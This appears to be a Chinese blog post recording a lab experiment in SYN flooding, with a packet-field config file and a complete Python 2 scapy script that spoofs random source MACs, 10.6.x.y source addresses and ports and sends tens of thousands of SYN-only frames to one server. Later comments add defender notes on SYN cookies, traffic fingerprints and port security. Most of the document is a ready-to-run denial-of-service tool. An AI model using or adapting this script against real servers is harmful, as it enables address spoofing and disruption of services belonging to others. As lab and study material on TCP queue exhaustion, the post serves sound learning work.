Python实验SYN攻击

Zss 发表于:

使用Python在二层网络中模拟不同的源地址和端口,向服务器发送TCP第一次握手包(SYN),但不回复第三次握手包(ACK)

使得服务器半连接的队列中长时间占用大量tcp连接

在使用scapy构造第一次握手包时需要注意:校验和如果不是自己计算出的正确值,就不要填写(留空时scapy会自动计算),否则服务器会丢弃这次握手包

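实验中发现TCP半连接队列最大为256个,暂时还不清楚原因,这个值应该可以在某处设置(如果服务器是Linux,半连接队列上限通常受 net.ipv4.tcp_max_syn_backlog、net.core.somaxconn 以及应用调用 listen() 时的 backlog 参数共同影响)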

当开始发送数据包后,在服务器上使用命令:while :;do sleep 1;netstat -nat|grep -E 'tcp\s'|grep -E 'SYN';echo -------;done

查看到半连接数瞬间占满,但是此时服务器并不会down掉,还是能正常连接(如果服务器是Linux,这很可能是因为启用了 SYN cookies,即 net.ipv4.tcp_syncookies:队列占满后服务器仍能完成正常握手,这也是针对SYN洪水的常用缓解措施)

配置文件:

[CONFIG]
network_iface=Intel(R) Ethernet Connection I219-V
# Interface to send on; fill in the adapter's description string.


eth_dst=8c:ec:4b:58:b8:96
# Destination MAC address of the Ethernet frame.
eth_src=4c:cc:6a:34:4e:11
# Source MAC address of the Ethernet frame. The accompanying script parses this
# key but builds every frame with a randomly generated source MAC instead.
eth_type=2048
# EtherType of the frame; 2048 is 0x0800 (IPv4).


# IPv4 header fields. Every value below is constant across all frames the
# script sends, except ip_src, which the script overrides per frame.
ip_version=4

ip_ihl=5

ip_tos=0

# 40 = 20-byte IP header (ip_ihl=5) + 20-byte TCP header (tcp_dataofs=5), no payload.
ip_len=40

ip_id=31036

ip_flags=DF

ip_frag=0

ip_ttl=128

ip_proto=tcp

# Parsed by the script but never passed to IP(), so scapy computes the real
# header checksum when the packet is built.
ip_chksum=0

# Parsed but unused: the script substitutes a generated 10.6.x.y source address.
ip_src=10.6.161.169

ip_dst=10.6.161.252

ip_options=


# TCP header fields.
# tcp_sport is parsed but unused: the script picks a random source port per frame.
tcp_sport=4565
tcp_dport=80
tcp_seq=931545279
# NOTE(review): a non-zero acknowledgment number on a segment whose only flag
# is SYN (tcp_flags=S) is unusual for ordinary clients, which typically send 0
# here; together with the fixed tcp_seq, tcp_window and ip_id it makes this
# traffic straightforward to fingerprint on the defending side.
tcp_ack=1282193866
tcp_dataofs=5
tcp_reserved=0
tcp_flags=S
tcp_window=1024
# Parsed by the script but never passed to TCP(); scapy computes the checksum.
tcp_chksum=27592
tcp_urgptr=0
tcp_options=
#coding:gbk
from configparser import ConfigParser
from subprocess import PIPE,Popen
from threading import Thread
from scapy.all import *

class Configinfo():
    """Load the ``[CONFIG]`` section of an INI file into the ``config`` dict.

    The keys mirror Ethernet, IPv4 and TCP header field names. Values that
    are wrapped in ``int()`` below are stored as integers; the rest are
    stored as the result of ``.encode('gbk')`` on the raw option text.

    NOTE(review): the ``print`` statement in the error handler means this
    file targets Python 2.
    """
    def __init__(self,config_file):
        """Parse *config_file* and populate ``self.config``.

        Any exception raised while reading an option (missing section or
        key, non-numeric text passed to ``int()``, encoding failure) is
        reported on stdout and the process is terminated with ``exit()``;
        the constructor never returns a partially filled object to the caller.
        """
        readconfig = ConfigParser()
        # ConfigParser.read() skips files it cannot open instead of raising,
        # so a missing file only surfaces as a failed get() in the try block.
        readconfig.read(config_file)
        self.config = {}
        try:
            # Encoding applied to every option value after it is read.
            code = 'gbk'
            # Name/description of the network interface used for sending.
            self.config['network_iface'] = readconfig.get('CONFIG', 'network_iface').encode(code)

            # Ethernet header fields. eth_type stays text here; the caller in
            # this file converts it with int() when building the frame.
            self.config['eth_dst'] = readconfig.get('CONFIG','eth_dst').encode(code)
            self.config['eth_src'] = readconfig.get('CONFIG', 'eth_src').encode(code)
            self.config['eth_type'] = readconfig.get('CONFIG','eth_type').encode(code)

            # IPv4 header fields.
            self.config['ip_version'] = int(readconfig.get('CONFIG', 'ip_version').encode(code))
            self.config['ip_ihl'] = int(readconfig.get('CONFIG', 'ip_ihl').encode(code))
            self.config['ip_tos'] = int(readconfig.get('CONFIG', 'ip_tos').encode(code))
            self.config['ip_len'] = int(readconfig.get('CONFIG', 'ip_len').encode(code))
            self.config['ip_id'] = int(readconfig.get('CONFIG', 'ip_id').encode(code))
            self.config['ip_flags'] = readconfig.get('CONFIG', 'ip_flags').encode(code)
            self.config['ip_frag'] = int(readconfig.get('CONFIG', 'ip_frag').encode(code))
            self.config['ip_ttl'] = int(readconfig.get('CONFIG', 'ip_ttl').encode(code))
            self.config['ip_proto'] = readconfig.get('CONFIG', 'ip_proto').encode(code)
            # Loaded for completeness; the __main__ block in this file does
            # not hand ip_chksum to the IP() constructor.
            self.config['ip_chksum'] = int(readconfig.get('CONFIG', 'ip_chksum').encode(code))
            self.config['ip_src'] = readconfig.get('CONFIG', 'ip_src').encode(code)
            self.config['ip_dst'] = readconfig.get('CONFIG', 'ip_dst').encode(code)
            self.config['ip_options'] = readconfig.get('CONFIG', 'ip_options').encode(code)

            # TCP header fields.
            self.config['tcp_sport'] = int(readconfig.get('CONFIG', 'tcp_sport').encode(code))
            self.config['tcp_dport'] = int(readconfig.get('CONFIG', 'tcp_dport').encode(code))
            self.config['tcp_seq'] = int(readconfig.get('CONFIG', 'tcp_seq').encode(code))
            self.config['tcp_ack'] = int(readconfig.get('CONFIG', 'tcp_ack').encode(code))
            self.config['tcp_dataofs'] = int(readconfig.get('CONFIG', 'tcp_dataofs').encode(code))
            self.config['tcp_reserved'] = int(readconfig.get('CONFIG', 'tcp_reserved').encode(code))
            self.config['tcp_flags'] = readconfig.get('CONFIG', 'tcp_flags').encode(code)
            self.config['tcp_window'] = int(readconfig.get('CONFIG', 'tcp_window').encode(code))
            # Loaded for completeness; the __main__ block in this file does
            # not hand tcp_chksum to the TCP() constructor.
            self.config['tcp_chksum'] = int(readconfig.get('CONFIG', 'tcp_chksum').encode(code))
            self.config['tcp_urgptr'] = int(readconfig.get('CONFIG', 'tcp_urgptr').encode(code))
            self.config['tcp_options'] = readconfig.get('CONFIG', 'tcp_options').encode(code)

        except Exception as e:
            # Broad catch: every failure above is reported the same way and
            # ends the process, so callers cannot recover from a bad config.
            print '读取发生错误:%s'%e
            exit()

def read_config(file_path):
    """Parse *file_path* with Configinfo and return its ``config`` dict."""
    return Configinfo(file_path).config

# Script entry point: builds Ethernet/IP/TCP frames from config.ini and sends
# them one at a time at layer 2. Per frame, only the source MAC, source IP and
# source port vary; every other header field is the constant from config.ini.
#
# Defender's view of the resulting traffic:
#   * One destination MAC/IP/port receives SYN-only segments from 233 * 233 =
#     54289 distinct 10.6.x.y sources, none of which completes the handshake,
#     so the server's SYN_RECV count climbs (the netstat loop in the article
#     shows exactly this).
#   * IP ID, TTL, TCP sequence number, acknowledgment number and window are
#     identical in every frame, which gives a simple signature for an IDS rule
#     or a capture filter.
#   * Each frame carries a fresh random source MAC; on a switched segment that
#     is the kind of behaviour per-port MAC limits (port security) and source
#     address validation are meant to catch.
#   * On the server side, SYN cookies and an adequately sized SYN backlog are
#     the standard mitigations for this queue-exhaustion pattern.
if __name__ == '__main__':
    config = read_config('config.ini')
    # Hex digits used to assemble a random source MAC address.
    str_list = ['a', 'b', 'c', 'd', 'e', 'f', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
    # range(1, 234) yields 1..233 for both loops; i becomes the fourth octet
    # and t the third octet of the source address.
    for  i in range(1,234):
        for t in range(1, 234):
            # Six colon-separated pairs of random hex digits.
            # NOTE(review): `random` is not imported explicitly in this file;
            # presumably it arrives through `from scapy.all import *` - confirm.
            eth_src = random.choice(str_list) + random.choice(str_list) + ':' + random.choice(str_list) + random.choice(
                str_list) + ':' + random.choice(str_list) + random.choice(str_list) + ':' + random.choice(
                str_list) + random.choice(str_list) + ':' + random.choice(str_list) + random.choice(
                str_list) + ':' + random.choice(str_list) + random.choice(str_list)
            # Source address and port replace the ip_src / tcp_sport values
            # from the config file; randint includes both 1000 and 60000.
            ip_src = '10.6.%d.%d'%(t,i)
            sport = random.randint(1000,60000)
            # config['eth_src'] is ignored in favour of the random MAC above.
            eth = Ether(dst=config['eth_dst'],src=eth_src,type=int(config['eth_type']))
            # No chksum argument is passed to IP() or TCP(): scapy computes
            # both checksums when the packet is built, matching the article's
            # remark that a wrong hand-filled checksum gets the SYN dropped.
            ip = IP(version=config['ip_version'],ihl=config['ip_ihl'],tos=config['ip_tos'],\
                    len=config['ip_len'],id=config['ip_id'],flags=config['ip_flags'],frag=config['ip_frag'],\
                    ttl=config['ip_ttl'],proto=config['ip_proto'],src=ip_src,\
                    dst=config['ip_dst'],options=config['ip_options'])
            tcp = TCP(sport=sport,dport=config['tcp_dport'],seq=config['tcp_seq'],ack=config['tcp_ack'],\
                      dataofs=config['tcp_dataofs'],reserved=config['tcp_reserved'],flags=config['tcp_flags'],\
                      window=config['tcp_window'],urgptr=config['tcp_urgptr'],options=config['tcp_options'])
            pack=eth/ip/tcp
            # sendp() transmits at layer 2 on the configured interface, one
            # frame per call; no reply is read, so the handshake never completes.
            sendp(pack,iface=config['network_iface'],count=1)